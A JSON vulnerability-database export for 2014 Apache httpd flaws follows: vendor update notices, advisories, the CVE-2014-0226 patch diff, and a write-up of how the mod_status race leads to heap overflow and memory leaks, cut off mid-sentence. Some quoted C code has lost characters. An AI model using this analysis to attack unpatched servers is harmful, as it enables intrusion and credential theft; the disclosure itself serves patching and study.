rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098</a>>\n * CVE-2013-6438\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438</a>>\n * CVE-2014-0226\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226</a>>\n * CVE-2014-0231\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231</a>>\n\n", "edition": 1, "modified": "2014-09-02T19:04:20", "published": "2014-09-02T19:04:20", "id": "SUSE-SU-2014:1080-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00000.html", "type": "suse", "title": "Security update for apache2 (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:56:35", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-1896", "CVE-2014-0098", "CVE-2013-1862", "CVE-2013-6438", "CVE-2014-0226"], "description": "This apache2 update fixes the following security issues:\n\n * log_cookie mod_log_config.c remote denial of service (CVE-2014-0098,\n bnc#869106)\n * mod_dav denial of service (CVE-2013-6438, bnc#869105)\n * mod_cgid denial of service (CVE-2014-0231, bnc#887768)\n * mod_status heap-based buffer overflow (CVE-2014-0226, bnc#887765)\n * mod_rewrite: escape logdata to avoid terminal escapes\n (CVE-2013-1862, bnc#829057)\n * mod_dav: segfault in merge request (CVE-2013-1896, bnc#829056)\n\n Security Issues:\n\n * CVE-2014-0098\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098</a>>\n * CVE-2013-6438\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438</a>>\n * CVE-2014-0226\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226</a>>\n * CVE-2014-0231\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231</a>>\n * CVE-2013-1862\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862</a>>\n * CVE-2013-1896\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1896\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1896</a>>\n\n\n", "edition": 1, "modified": "2014-09-02T21:04:17", "published": "2014-09-02T21:04:17", "id": "SUSE-SU-2014:1082-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00002.html", "title": "Security update for apache2 (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-4352", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "description": "[2.4.6-18.0.1.el7_0]\n- replace index.html with Oracle's index page oracle_index.html\n[2.4.6-18]\n- mod_cgid: add security fix for CVE-2014-0231 (#1120607)\n- mod_proxy: add security fix for CVE-2014-0117 (#1120607)\n- mod_deflate: add security fix for CVE-2014-0118 (#1120607)\n- mod_status: add security fix for CVE-2014-0226 (#1120607)\n- mod_cache: add secutiry fix for CVE-2013-4352 (#1120607)", "edition": 4, "modified": "2014-07-23T00:00:00", "published": "2014-07-23T00:00:00", "id": "ELSA-2014-0921", "href": "http://linux.oracle.com/errata/ELSA-2014-0921.html", "title": "httpd security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:11", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-4352", "CVE-2014-3583", "CVE-2013-5704", "CVE-2014-0118", "CVE-2014-3581", "CVE-2014-0117", "CVE-2014-0226"], "description": "[2.4.6-22.0.1.el6]\n- remove enable-tlsv1x-thunks to fit openssl 1.x api\n- replace index.html with Oracle's index page oracle_index.html\n- update vstring in specfile\n[2.4.6-22]\n- Remove mod_proxy_fcgi fix for heap-based buffer overflow,\n httpd-2.4.6 is not affected (CVE-2014-3583)\n[2.4.6-21]\n- mod_proxy_wstunnel: Fix the use of SSL with the 'wss:' scheme (#1141950)\n[2.4.6-20]\n- core: fix bypassing of mod_headers rules via chunked requests (CVE-2013-5704)\n- mod_cache: fix NULL pointer dereference on empty Content-Type (CVE-2014-3581)\n- mod_proxy_fcgi: fix heap-based buffer overflow (CVE-2014-3583)\n[2.4.6-19]\n- mod_cgid: add security fix for CVE-2014-0231\n- mod_proxy: add security fix for CVE-2014-0117\n- mod_deflate: add security fix for CVE-2014-0118\n- mod_status: add security fix for CVE-2014-0226\n- mod_cache: add secutiry fix for CVE-2013-4352", "edition": 4, "modified": "2016-02-04T00:00:00", "published": "2016-02-04T00:00:00", "id": "ELSA-2014-1972", "href": "http://linux.oracle.com/errata/ELSA-2014-1972.html", "title": "httpd24-httpd security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "httpd": [{"lastseen": "2020-12-24T14:26:50", "bulletinFamily": "software", "cvelist": ["CVE-2014-0118"], "description": "\nA resource consumption flaw was found in mod_deflate. If request body\ndecompression was configured (using the \"DEFLATE\" input filter), a\nremote attacker could cause the server to consume significant memory \nand/or CPU resources. The use of request body decompression is not a common\nconfiguration.\n", "edition": 5, "modified": "2014-07-14T00:00:00", "published": "2014-02-19T00:00:00", "id": "HTTPD:4979B5C50BFE930EB922EF4650B13100", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_deflate denial of service", "type": "httpd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-0118"], "edition": 1, "description": "\nA resource consumption flaw was found in mod_deflate. If request body\ndecompression was configured (using the \"DEFLATE\" input filter), a\nremote attacker could cause the server to consume significant memory \nand/or CPU resources. The use of request body decompression is not a common\nconfiguration.\n", "modified": "2014-09-03T00:00:00", "published": "2014-02-19T00:00:00", "id": "HTTPD:B59ABFE21648992992E0F3E6F9B79EC6", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.29: mod_deflate denial of service", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-0118"], "edition": 1, "description": "\nA resource consumption flaw was found in mod_deflate. If request body\ndecompression was configured (using the \"DEFLATE\" input filter), a\nremote attacker could cause the server to consume significant memory \nand/or CPU resources. The use of request body decompression is not a common\nconfiguration.\n", "modified": "2014-07-14T00:00:00", "published": "2014-02-19T00:00:00", "id": "HTTPD:A46DC391ADD17CB8CA52B09A7D4194CD", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.4.10: mod_deflate denial of service", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-0226"], "edition": 1, "description": "\nA race condition was found in mod_status. An attacker able to access\na public server status page on a server using a threaded MPM could send a\ncarefully crafted request which could lead to a heap buffer overflow. Note\nthat it is not a default or recommended configuration to have a public\naccessible server status page.\n", "modified": "2014-09-03T00:00:00", "published": "2014-05-30T00:00:00", "id": "HTTPD:E3EA50E892151D4F57BF7B9A57DDA94D", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.29: mod_status buffer overflow", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-0226"], "edition": 1, "description": "\nA race condition was found in mod_status. An attacker able to access\na public server status page on a server using a threaded MPM could send a\ncarefully crafted request which could lead to a heap buffer overflow. Note\nthat it is not a default or recommended configuration to have a public\naccessible server status page.\n", "modified": "2014-07-14T00:00:00", "published": "2014-05-30T00:00:00", "id": "HTTPD:6F38DA367086990E883C7F7B4D5E5DBB", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.4.10: mod_status buffer overflow", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-12-24T14:26:50", "bulletinFamily": "software", "cvelist": ["CVE-2014-0226"], "description": "\nA race condition was found in mod_status. An attacker able to access\na public server status page on a server using a threaded MPM could send a\ncarefully crafted request which could lead to a heap buffer overflow. Note\nthat it is not a default or recommended configuration to have a public\naccessible server status page.\n", "edition": 5, "modified": "2014-07-14T00:00:00", "published": "2014-05-30T00:00:00", "id": "HTTPD:21BDE4F434D5052BD4CA91E0C09D07D2", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_status buffer overflow", "type": "httpd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2020-06-22T11:41:59", "bulletinFamily": "info", "cvelist": ["CVE-2014-0226"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache HTTPD server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the updating of mod_status. A race condition in mod_status allows an attacker to disclose information or corrupt memory with several requests to endpoints with handler server-status and other endpoints. By abusing this flaw, an attacker can possibly disclose credentials or leverage this situation to achieve remote code execution.", "modified": "2014-06-22T00:00:00", "published": "2014-07-16T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-14-236/", "id": "ZDI-14-236", "title": "Apache httpd mod_status Heap Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-06T23:12:29", "edition": 2, "description": "Exploit for linux platform in category dos / poc", "published": "2014-07-20T00:00:00", "type": "zdt", "title": "Apache 2.4.7 httpd mod_status Heap Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0226"], "modified": "2014-07-20T00:00:00", "id": "1337DAY-ID-22451", "href": "https://0day.today/exploit/description/22451", "sourceData": "URL: http://svn.apache.org/r1610499\r\nLog:\r\nMerge 1610491 from trunk:\r\n\r\nSECURITY (CVE-2014-0226): Fix a race condition in scoreboard handling,\r\nwhich could lead to a heap buffer overflow. Thanks to Marek Kroemeke\r\nworking with HP's Zero Day Initiative for reporting this.\r\n\r\n* include/scoreboard.h: Add ap_copy_scoreboard_worker.\r\n\r\n* server/scoreboard.c (ap_copy_scoreboard_worker): New function.\r\n\r\n* modules/generators/mod_status.c (status_handler): Use it.\r\n\r\n* modules/lua/lua_request.c (lua_ap_scoreboard_worker): Likewise.\r\n\r\nReviewed by: trawick, jorton, covener, jim\r\nSubmitted by: jorton, covener\r\n\r\nModified:\r\nhttpd/httpd/branches/2.4.x/ (props changed)\r\nhttpd/httpd/branches/2.4.x/CHANGES\r\nhttpd/httpd/branches/2.4.x/include/ap_mmn.h\r\nhttpd/httpd/branches/2.4.x/include/scoreboard.h\r\nhttpd/httpd/branches/2.4.x/modules/generators/mod_status.c\r\nhttpd/httpd/branches/2.4.x/modules/lua/lua_request.c\r\nhttpd/httpd/branches/2.4.x/server/scoreboard.c\r\n\r\nPropchange: httpd/httpd/branches/2.4.x/\r\n------------------------------------------------------------------------------\r\nMerged /httpd/httpd/trunk:r1610491\r\n\r\nModified: httpd/httpd/branches/2.4.x/CHANGES\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/CHANGES?rev=1610499&r1=1610498&r2=1610499&view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/CHANGES [utf-8] (original)\r\n+++ httpd/httpd/branches/2.4.x/CHANGES [utf-8] Mon Jul 14 19:55:04 2014\r\n@@ -2,6 +2,10 @@\r\n\r\nChanges with Apache 2.4.10\r\n\r\n+ *) SECURITY: CVE-2014-0226 (cve.mitre.org)\r\n+ Fix a race condition in scoreboard handling, which could lead to\r\n+ a heap buffer overflow. [Joe Orton]\r\n+\r\n*) mod_ssl: Extend the scope of SSLSessionCacheTimeout to sessions\r\nresumed by TLS session resumption (RFC 5077). [Rainer Jung]\r\n\r\n\r\nModified: httpd/httpd/branches/2.4.x/include/ap_mmn.h\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/include/ap_mmn.h?rev=1610499&r1=1610498&r2=1610499&v\r\niew=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/include/ap_mmn.h (original)\r\n+++ httpd/httpd/branches/2.4.x/include/ap_mmn.h Mon Jul 14 19:55:04 2014\r\n@@ -431,6 +431,7 @@\r\n* 20120211.34 (2.4.10-dev) AP_DEFAULT_HANDLER_NAME/AP_IS_DEFAULT_HANDLER_NAME\r\n* 20120211.35 (2.4.10-dev) Add \"r\", \"must_rebind\", and last_backend_conn\r\nto util_ldap_connection_t\r\n+ * 20120211.36 (2.4.10-dev) Add ap_copy_scoreboard_worker()\r\n*/\r\n\r\n#define MODULE_MAGIC_COOKIE 0x41503234UL /* \"AP24\" */\r\n@@ -438,7 +439,7 @@\r\n#ifndef MODULE_MAGIC_NUMBER_MAJOR\r\n#define MODULE_MAGIC_NUMBER_MAJOR 20120211\r\n#endif\r\n-#define MODULE_MAGIC_NUMBER_MINOR 35 /* 0...n */\r\n+#define MODULE_MAGIC_NUMBER_MINOR 36 /* 0...n */\r\n\r\n/**\r\n* Determine if the server's current MODULE_MAGIC_NUMBER is at least a\r\n\r\nModified: httpd/httpd/branches/2.4.x/include/scoreboard.h\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/include/scoreboard.h?rev=1610499&r1=1610498&r2=1610499&a\r\nmp;view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/include/scoreboard.h (original)\r\n+++ httpd/httpd/branches/2.4.x/include/scoreboard.h Mon Jul 14 19:55:04 2014\r\n@@ -183,8 +183,25 @@ AP_DECLARE(int) ap_update_child_status_f\r\nAP_DECLARE(void) ap_time_process_request(ap_sb_handle_t *sbh, int status);\r\n\r\nAP_DECLARE(worker_score *) ap_get_scoreboard_worker(ap_sb_handle_t *sbh);\r\n+\r\n+/** Return a pointer to the worker_score for a given child, thread pair.\r\n+ * @param child_num The child number.\r\n+ * @param thread_num The thread number.\r\n+ * @return A pointer to the worker_score structure.\r\n+ * @deprecated This function is deprecated, use ap_copy_scoreboard_worker instead. */\r\nAP_DECLARE(worker_score *) ap_get_scoreboard_worker_from_indexes(int child_num,\r\nint thread_num);\r\n+\r\n+/** Copy the contents of a worker scoreboard entry. The contents of\r\n+ * the worker_score structure are copied verbatim into the dest\r\n+ * structure.\r\n+ * @param dest Output parameter.\r\n+ * @param child_num The child number.\r\n+ * @param thread_num The thread number.\r\n+ */\r\n+AP_DECLARE(void) ap_copy_scoreboard_worker(worker_score *dest,\r\n+ int child_num, int thread_num);\r\n+\r\nAP_DECLARE(process_score *) ap_get_scoreboard_process(int x);\r\nAP_DECLARE(global_score *) ap_get_scoreboard_global(void);\r\n\r\n\r\nModified: httpd/httpd/branches/2.4.x/modules/generators/mod_status.c\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/modules/generators/mod_status.c?rev=1610499&r1=1610498&r\r\n2=1610499&view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/modules/generators/mod_status.c (original)\r\n+++ httpd/httpd/branches/2.4.x/modules/generators/mod_status.c Mon Jul 14 19:55:04 2014\r\n@@ -194,7 +194,7 @@ static int status_handler(request_rec *r\r\nlong req_time;\r\nint short_report;\r\nint no_table_report;\r\n- worker_score *ws_record;\r\n+ worker_score *ws_record = apr_palloc(r->pool, sizeof *ws_record);\r\nprocess_score *ps_record;\r\nchar *stat_buffer;\r\npid_t *pid_buffer, worker_pid;\r\n@@ -306,7 +306,7 @@ static int status_handler(request_rec *r\r\nfor (j = 0; j < thread_limit; ++j) {\r\nint indx = (i * thread_limit) + j;\r\n\r\n- ws_record = ap_get_scoreboard_worker_from_indexes(i, j);\r\n+ ap_copy_scoreboard_worker(ws_record, i, j);\r\nres = ws_record->status;\r\n\r\nif ((i >= max_servers || j >= threads_per_child)\r\n@@ -637,7 +637,7 @@ static int status_handler(request_rec *r\r\n\r\nfor (i = 0; i < server_limit; ++i) {\r\nfor (j = 0; j < thread_limit; ++j) {\r\n- ws_record = ap_get_scoreboard_worker_from_indexes(i, j);\r\n+ ap_copy_scoreboard_worker(ws_record, i, j);\r\n\r\nif (ws_record->access_count == 0 &&\r\n(ws_record->status == SERVER_READY ||\r\n\r\nModified: httpd/httpd/branches/2.4.x/modules/lua/lua_request.c\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/modules/lua/lua_request.c?rev=1610499&r1=1610498&r2=1610\r\n499&view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/modules/lua/lua_request.c (original)\r\n+++ httpd/httpd/branches/2.4.x/modules/lua/lua_request.c Mon Jul 14 19:55:04 2014\r\n@@ -1245,16 +1245,22 @@ static int lua_ap_scoreboard_process(lua\r\n*/\r\nstatic int lua_ap_scoreboard_worker(lua_State *L)\r\n{\r\n- int i,\r\n- j;\r\n- worker_score *ws_record;\r\n+ int i, j;\r\n+ worker_score *ws_record = NULL;\r\n+ request_rec *r = NULL;\r\n\r\nluaL_checktype(L, 1, LUA_TUSERDATA);\r\nluaL_checktype(L, 2, LUA_TNUMBER);\r\nluaL_checktype(L, 3, LUA_TNUMBER);\r\n+\r\n+ r = ap_lua_check_request_rec(L, 1);\r\n+ if (!r) return 0;\r\n+\r\ni = lua_tointeger(L, 2);\r\nj = lua_tointeger(L, 3);\r\n- ws_record = ap_get_scoreboard_worker_from_indexes(i, j);\r\n+ ws_record = apr_palloc(r->pool, sizeof *ws_record);\r\n+\r\n+ ap_copy_scoreboard_worker(ws_record, i, j);\r\nif (ws_record) {\r\nlua_newtable(L);\r\n\r\n\r\nModified: httpd/httpd/branches/2.4.x/server/scoreboard.c\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/server/scoreboard.c?rev=1610499&r1=1610498&r2=1610499&am\r\np;view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/server/scoreboard.c (original)\r\n+++ httpd/httpd/branches/2.4.x/server/scoreboard.c Mon Jul 14 19:55:04 2014\r\n@@ -579,6 +579,21 @@ AP_DECLARE(worker_score *) ap_get_scoreb\r\nsbh->thread_num);\r\n}\r\n\r\n+AP_DECLARE(void) ap_copy_scoreboard_worker(worker_score *dest,\r\n+ int child_num,\r\n+ int thread_num)\r\n+{\r\n+ worker_score *ws = ap_get_scoreboard_worker_from_indexes(child_num, thread_num);\r\n+\r\n+ memcpy(dest, ws, sizeof *ws);\r\n+\r\n+ /* For extra safety, NUL-terminate the strings returned, though it\r\n+ * should be true those last bytes are always zero anyway. */\r\n+ dest->client[sizeof(dest->client) - 1] = '\\0';\r\n+ dest->request[sizeof(dest->request) - 1] = '\\0';\r\n+ dest->vhost[sizeof(dest->vhost) - 1] = '\\0';\r\n+}\r\n+\r\nAP_DECLARE(process_score *) ap_get_scoreboard_process(int x)\r\n{\r\nif ((x < 0) || (x >= server_limit)) {\r\n\r\n\r\n-----------------------------------------------------------------------\r\nApache 2.4.7 mod_status Scoreboard Handling Race Condition\r\n-----------------------------------------------------------------------\r\n\r\n--[ 0. Sparse summary\r\nRace condition between updating httpd's \"scoreboard\" and mod_status,\r\nleading to several critical scenarios like heap buffer overflow with\r\nuser\r\nsupplied payload and leaking heap which can leak critical memory\r\ncontaining\r\nhtaccess credentials, ssl certificates private keys and so on.\r\n--[ 1. Prerequisites\r\n \r\nApache httpd compiled with MPM event or MPM worker.\r\nThe tested version was 2.4.7 compiled with:\r\n \r\n ./configure --enable-mods-shared=reallyall --with-included-apr\r\n \r\nThe tested mod_status configuration in httpd.conf was:\r\n SetHandler server-status\r\n ExtendedStatus On\r\n--[ 2. Race Condition\r\n \r\nFunction ap_escape_logitem in server/util.c looks as follows:\r\n \r\n 1908AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char\r\n*str)\r\n 1909{\r\n 1910 char *ret;\r\n 1911 unsigned char *d;\r\n 1912 const unsigned char *s;\r\n 1913 apr_size_t length, escapes = 0;\r\n 1914\r\n 1915 if (!str) {\r\n 1916 return NULL;\r\n 1917 }\r\n 1918\r\n 1919 /* Compute how many characters need to be escaped */\r\n 1920 s = (const unsigned char *)str;\r\n 1921 for (; *s; ++s) {\r\n 1922 if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) {\r\n 1923 escapes++;\r\n 1924 }\r\n 1925 }\r\n 1926\r\n 1927 /* Compute the length of the input string, including NULL\r\n*/\r\n 1928 length = s - (const unsigned char *)str + 1;\r\n 1929\r\n 1930 /* Fast path: nothing to escape */\r\n 1931 if (escapes == 0) {\r\n 1932 return apr_pmemdup(p, str, length);\r\n 1933 }\r\n \r\nIn the for-loop between 1921 and 1925 lines function is computing the\r\nlength of\r\nsupplied str (almost like strlen, but additionally it counts special\r\ncharacters\r\nwhich need to be escaped). As comment in 1927 value says, function\r\ncomputes count\r\nof bytes to copy. If there's nothing to escape function uses\r\napr_pmemdup to duplicate\r\nthe str. In our single-threaded mind everything looks good, but tricky\r\npart starts\r\nwhen we introduce multi-threading. Apache in MPM mode runs workers as\r\nthreads, let's\r\nconsider the following scenario:\r\n \r\n 1) ap_escape_logitem(pool, \"\") is called\r\n 2) for-loop in 1921 line immediately escapes, because *s is in\r\nfirst loop run\r\n 3) malicious thread change memory under *s to another value\r\n(something which is not )\r\n 4) apr_pmemdup copies that change value to new string and returns\r\nit\r\n \r\nOutput from the ap_escape_logitem is considered to be a string, if\r\nscenario above would occur,\r\nthen returned string would not be zeroed at the end, which may be\r\nharmful. The mod_status\r\ncode looks as follows:\r\n \r\n 833 ap_rprintf(r, \"%s%s\"\r\n 834 \"%snn\",\r\n 835 ap_escape_html(r->pool,\r\n 836 \r\nws_record->client),\r\n 837 ap_escape_html(r->pool,\r\n 838 \r\nws_record->vhost),\r\n 839 ap_escape_html(r->pool,\r\n 840 \r\nap_escape_logitem(r->pool,\r\n 841 \r\nws_record->request)));\r\n \r\nThe relevant call to ap_escape_html() is at line 839 after the\r\nevaluation of ap_escape_logitem().\r\nThe first argument passed to the ap_escape_logitem() is in fact an apr\r\npool associated with\r\nthe HTTP request and defined in the request_rec structure.\r\n \r\nThis code is a part of a larger for-loop where code is iterating over\r\nworker_score structs which is\r\ndefined as follows:\r\n \r\n 90struct worker_score {\r\n 91#if APR_HAS_THREADS\r\n 92 apr_os_thread_t tid;\r\n 93#endif\r\n 94 int thread_num;\r\n 95 /* With some MPMs (e.g., worker), a worker_score can\r\nrepresent\r\n 96 * a thread in a terminating process which is no longer\r\n 97 * represented by the corresponding process_score. These\r\nMPMs\r\n 98 * should set pid and generation fields in the worker_score.\r\n 99 */\r\n 100 pid_t pid;\r\n 101 ap_generation_t generation;\r\n 102 unsigned char status;\r\n 103 unsigned short conn_count;\r\n 104 apr_off_t conn_bytes;\r\n 105 unsigned long access_count;\r\n 106 apr_off_t bytes_served;\r\n 107 unsigned long my_access_count;\r\n 108 apr_off_t my_bytes_served;\r\n 109 apr_time_t start_time;\r\n 110 apr_time_t stop_time;\r\n 111 apr_time_t last_used;\r\n 112#ifdef HAVE_TIMES\r\n 113 struct tms times;\r\n 114#endif\r\n 115 char client[40]; /* Keep 'em small... but large\r\nenough to hold an IPv6 address */\r\n 116 char request[64]; /* We just want an idea... */\r\n 117 char vhost[32]; /* What virtual host is being\r\naccessed? */\r\n 118};\r\n \r\nThe 'request' field in a worker_score structure is particularly\r\ninteresting - this field can be changed inside\r\nthe copy_request function, which is called by the\r\nupdate_child_status_internal. This change may occur when the\r\nmod_status is iterating over the workers at the same time the\r\nap_escape_logitem is called within a different\r\nthread, leading to a race condition. We can trigger this exact\r\nscenario in order to return a string without a\r\ntrailing . This can be achived by running two clients, one triggering\r\nthe mod_status handler and second\r\nsending random requests to the web server. Let's consider the\r\nfollowing example:\r\n \r\n 1) the mod_status iterates over workers invoking\r\nupdate_child_status_internal()\r\n 2) at some point for one worker mod_status calls\r\nap_escape_logitem(pool, ws_record->request)\r\n 3) let's asume that ws_record->request at the beginning is \"\"\r\nliterally at the first byte.\r\n 4) inside the ap_escape_logitem function the length of the\r\nws_record->request is computed, which is 1\r\n (an empty string consisting of )\r\n 5) another thread modifies ws_record->request (in fact it's called\r\nws->request in update_child_status_internal\r\n function but it's exactly the same location in memory) and puts\r\nthere i.e. \"GET / HTTP/1.0\"\r\n 6) the ap_pmemdup(pool, str, 1) in ap_escape_logitem copies the\r\nfirst one byte from \"GET / HTTP/1.0\" - \"G\" in\r\n that case and returns it. The ap_pmemdup looks as follows:\r\n \r\n 112APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void\r\n*m, apr_size_t n)\r\n 113{\r\n 114 void *res;\r\n 115\r\n 116 if (m == NULL)\r\n 117 return NULL;\r\n 118 res = apr_palloc(a, n);\r\n 119 memcpy(res, m, n);\r\n 120 return res;\r\n \r\n It allocates memory using apr_palloc function which returns\r\n\"ditry\" memory (note that apr_pcalloc overwrite\r\n allocated memory with NULs).\r\n \r\n So it's non-deterministic what's after the copied \"G\" byte.\r\nThere might be or might be not. For now let's\r\n assume that the memory allocated by apr_palloc was dirty\r\n(containing random bytes).\r\n 7) ap_escape_logitem returns \"G.....\" .junk. \"\"\r\n \r\nThe value from the example above is then pushed to the ap_escape_html2\r\nfunction which is also declared in util.c:\r\n \r\n 1860AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char\r\n*s, int toasc)\r\n 1861{\r\n 1862 int i, j;\r\n 1863 char *x;\r\n 1864\r\n 1865 /* first, count the number of extra characters */\r\n 1866 for (i = 0, j = 0; s[i] != ''; i++)\r\n 1867 if (s[i] == '')\r\n 1868 j += 3;\r\n 1869 else if (s[i] == '&')\r\n 1870 j += 4;\r\n 1871 else if (s[i] == '\"')\r\n 1872 j += 5;\r\n 1873 else if (toasc && !apr_isascii(s[i]))\r\n 1874 j += 5;\r\n 1875\r\n 1876 if (j == 0)\r\n 1877 return apr_pstrmemdup(p, s, i);\r\n 1878\r\n 1879 x = apr_palloc(p, i + j + 1);\r\n 1880 for (i = 0, j = 0; s[i] != ''; i++, j++)\r\n 1881 if (s[i] == '') {\r\n 1886 memcpy(&x[j], \">\", 4);\r\n 1887 j += 3;\r\n 1888 }\r\n 1889 else if (s[i] == '&') {\r\n 1890 memcpy(&x[j], \"&\", 5);\r\n 1891 j += 4;\r\n 1892 }\r\n 1893 else if (s[i] == '\"') {\r\n 1894 memcpy(&x[j], \"\"\", 6);\r\n 1895 j += 5;\r\n 1896 }\r\n 1897 else if (toasc && !apr_isascii(s[i])) {\r\n 1898 char *esc = apr_psprintf(p, \"&#%3.3d;\", (unsigned\r\nchar)s[i]);\r\n 1899 memcpy(&x[j], esc, 6);\r\n 1900 j += 5;\r\n 1901 }\r\n 1902 else\r\n 1903 x[j] = s[i];\r\n 1904\r\n 1905 x[j] = '';\r\n 1906 return x;\r\n 1907}\r\n \r\nIf the string from the example above would be passed to this function\r\nwe should get the following code-flow:\r\n \r\n 1) in the for-loop started in line 1866 we count the length of\r\nescaped string\r\n 2) because 's' string contains junk (due to only one byte being\r\nallocated by the apr_palloc function),\r\n it may contain '>' character. Let's assume that this is our\r\ncase\r\n 3) after for-loop in 1866 line 'j' is greater than 0 (at least one\r\ns[i] equals '>' as assumed above\r\n 4) in the 1879 line memory for escaped 'd' string is allocated\r\n 5) for-loop started in line 1880 copies string 's' to the escaped\r\n'd' string BUT apr_palloc has allocated\r\n only one byte for 's'. Thus, for each i > 0 the loop reads\r\nrandom memory and copies that value\r\n to 'd' string. At this point it's possible to trigger an\r\ninformation leak vulnerability (see section 5).\r\n \r\nHowever the 's' string may overlap with 'd' i.e.:\r\n \r\n 's' is allocated under 0 with contents s = \"AAAAAAAA>\"\r\n 'd' is allocated under 8 then s[8] = d[0].\r\n \r\nIf that would be the case, then for-loop would run forever (s[i] never\r\nwould be since 